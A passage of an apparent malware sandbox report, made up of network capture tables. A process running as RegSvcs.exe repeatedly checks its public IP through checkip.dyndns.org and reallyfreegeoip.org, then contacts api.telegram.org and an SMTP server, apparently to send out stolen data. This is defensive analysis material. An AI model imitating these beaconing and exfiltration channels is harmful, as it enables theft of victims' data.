                                                                                                                      Jan 11, 2025 06:49:37.685173035 CET49969443192.168.2.9149.154.167.220
                                                                                                                      Jan 11, 2025 06:49:37.686539888 CET49969443192.168.2.9149.154.167.220
                                                                                                                      Jan 11, 2025 06:49:37.686546087 CET44349969149.154.167.220192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:37.686942101 CET44349969149.154.167.220192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:37.688385010 CET49969443192.168.2.9149.154.167.220
                                                                                                                      Jan 11, 2025 06:49:37.731332064 CET44349969149.154.167.220192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:37.930617094 CET44349969149.154.167.220192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:37.930681944 CET44349969149.154.167.220192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:37.931358099 CET49969443192.168.2.9149.154.167.220
                                                                                                                      Jan 11, 2025 06:49:37.933248043 CET49969443192.168.2.9149.154.167.220
                                                                                                                      Jan 11, 2025 06:49:43.127897978 CET4990680192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:43.265258074 CET50009587192.168.2.93.130.71.34
                                                                                                                      Jan 11, 2025 06:49:43.270137072 CET587500093.130.71.34192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:43.270216942 CET50009587192.168.2.93.130.71.34
                                                                                                                      Jan 11, 2025 06:49:43.792289972 CET587500093.130.71.34192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:43.792515993 CET50009587192.168.2.93.130.71.34
                                                                                                                      Jan 11, 2025 06:49:43.797419071 CET587500093.130.71.34192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:44.080157995 CET587500093.130.71.34192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:44.080461979 CET50009587192.168.2.93.130.71.34
                                                                                                                      Jan 11, 2025 06:49:44.085426092 CET587500093.130.71.34192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:48.199358940 CET587500093.130.71.34192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:48.200629950 CET50009587192.168.2.93.130.71.34
                                                                                                                      Jan 11, 2025 06:49:48.205655098 CET587500093.130.71.34192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:52.112340927 CET587500093.130.71.34192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:52.112689972 CET50009587192.168.2.93.130.71.34
                                                                                                                      Jan 11, 2025 06:49:52.117613077 CET587500093.130.71.34192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:52.232073069 CET587500093.130.71.34192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:52.232239008 CET50009587192.168.2.93.130.71.34
                                                                                                                      Jan 11, 2025 06:49:52.237046957 CET587500093.130.71.34192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:52.352147102 CET587500093.130.71.34192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:52.352509022 CET50009587192.168.2.93.130.71.34
                                                                                                                      Jan 11, 2025 06:49:52.357637882 CET587500093.130.71.34192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:52.357692957 CET50009587192.168.2.93.130.71.34

                                                                                                                      UDP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Jan 11, 2025 06:49:10.129051924 CET5307553192.168.2.91.1.1.1
                                                                                                                      Jan 11, 2025 06:49:10.136888027 CET53530751.1.1.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:11.032289982 CET6180753192.168.2.91.1.1.1
                                                                                                                      Jan 11, 2025 06:49:11.039769888 CET53618071.1.1.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:21.545439959 CET6008853192.168.2.91.1.1.1
                                                                                                                      Jan 11, 2025 06:49:21.552520037 CET53600881.1.1.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:29.031821012 CET5533253192.168.2.91.1.1.1
                                                                                                                      Jan 11, 2025 06:49:29.043900013 CET53553321.1.1.1192.168.2.9

                                                                                                                      DNS Queries

                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                      Jan 11, 2025 06:49:10.129051924 CET192.168.2.91.1.1.10xa598Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                      Jan 11, 2025 06:49:11.032289982 CET192.168.2.91.1.1.10xe363Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                      Jan 11, 2025 06:49:21.545439959 CET192.168.2.91.1.1.10xac23Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                      Jan 11, 2025 06:49:29.031821012 CET192.168.2.91.1.1.10xc5e9Standard query (0)mail.acadental.comA (IP address)IN (0x0001)false

                                                                                                                      DNS Answers

                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                      Jan 11, 2025 06:48:59.905117989 CET1.1.1.1192.168.2.90x7eaNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Jan 11, 2025 06:48:59.905117989 CET1.1.1.1192.168.2.90x7eaNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                      Jan 11, 2025 06:49:10.136888027 CET1.1.1.1192.168.2.90xa598No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Jan 11, 2025 06:49:10.136888027 CET1.1.1.1192.168.2.90xa598No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                      Jan 11, 2025 06:49:10.136888027 CET1.1.1.1192.168.2.90xa598No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                      Jan 11, 2025 06:49:10.136888027 CET1.1.1.1192.168.2.90xa598No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                      Jan 11, 2025 06:49:10.136888027 CET1.1.1.1192.168.2.90xa598No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                      Jan 11, 2025 06:49:10.136888027 CET1.1.1.1192.168.2.90xa598No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                      Jan 11, 2025 06:49:11.039769888 CET1.1.1.1192.168.2.90xe363No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                      Jan 11, 2025 06:49:11.039769888 CET1.1.1.1192.168.2.90xe363No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                      Jan 11, 2025 06:49:11.039769888 CET1.1.1.1192.168.2.90xe363No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                      Jan 11, 2025 06:49:11.039769888 CET1.1.1.1192.168.2.90xe363No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                      Jan 11, 2025 06:49:11.039769888 CET1.1.1.1192.168.2.90xe363No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                      Jan 11, 2025 06:49:11.039769888 CET1.1.1.1192.168.2.90xe363No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                      Jan 11, 2025 06:49:11.039769888 CET1.1.1.1192.168.2.90xe363No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                      Jan 11, 2025 06:49:21.552520037 CET1.1.1.1192.168.2.90xac23No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                      Jan 11, 2025 06:49:29.043900013 CET1.1.1.1192.168.2.90xc5e9No error (0)mail.acadental.com3.130.71.34A (IP address)IN (0x0001)false

                                                                                                                      HTTP Request Dependency Graph

                                                                                                                      • reallyfreegeoip.org
                                                                                                                      • api.telegram.org
                                                                                                                      • checkip.dyndns.org

                                                                                                                      HTTP Packets

                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      0192.168.2.949764193.122.6.168807496C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 11, 2025 06:49:10.148556948 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Jan 11, 2025 06:49:10.793009996 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:10 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                      Jan 11, 2025 06:49:10.798657894 CET127OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Jan 11, 2025 06:49:10.987989902 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:10 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                      Jan 11, 2025 06:49:11.711788893 CET127OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Jan 11, 2025 06:49:11.901462078 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:11 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      1192.168.2.949782193.122.6.168807496C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 11, 2025 06:49:12.524004936 CET127OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Jan 11, 2025 06:49:13.154721022 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:13 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      2192.168.2.949792193.122.6.168807496C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 11, 2025 06:49:13.775276899 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Jan 11, 2025 06:49:14.401853085 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:14 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      3192.168.2.949801193.122.6.168807496C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 11, 2025 06:49:15.028100967 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Jan 11, 2025 06:49:15.689186096 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:15 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      4192.168.2.949813193.122.6.168807496C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 11, 2025 06:49:16.300710917 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Jan 11, 2025 06:49:16.931375980 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:16 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      5192.168.2.949821193.122.6.168807496C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 11, 2025 06:49:17.581176996 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Jan 11, 2025 06:49:18.215591908 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:18 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      6192.168.2.949832193.122.6.168807496C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 11, 2025 06:49:18.851454020 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Jan 11, 2025 06:49:19.550322056 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:19 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      7192.168.2.949845193.122.6.168807496C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 11, 2025 06:49:20.262974024 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Jan 11, 2025 06:49:20.904129982 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:20 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      8192.168.2.949883193.122.6.168807824C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 11, 2025 06:49:25.898000002 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Jan 11, 2025 06:49:26.523422003 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:26 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                      Jan 11, 2025 06:49:26.527600050 CET127OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Jan 11, 2025 06:49:26.714131117 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:26 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                      Jan 11, 2025 06:49:27.411701918 CET127OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Jan 11, 2025 06:49:27.597522974 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:27 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      9192.168.2.949898193.122.6.168807824C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 11, 2025 06:49:28.252887964 CET127OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Jan 11, 2025 06:49:28.876182079 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:28 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      10192.168.2.949906193.122.6.168807824C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 11, 2025 06:49:29.493094921 CET127OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Jan 11, 2025 06:49:30.118597984 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:30 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      11192.168.2.949917193.122.6.168807824C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
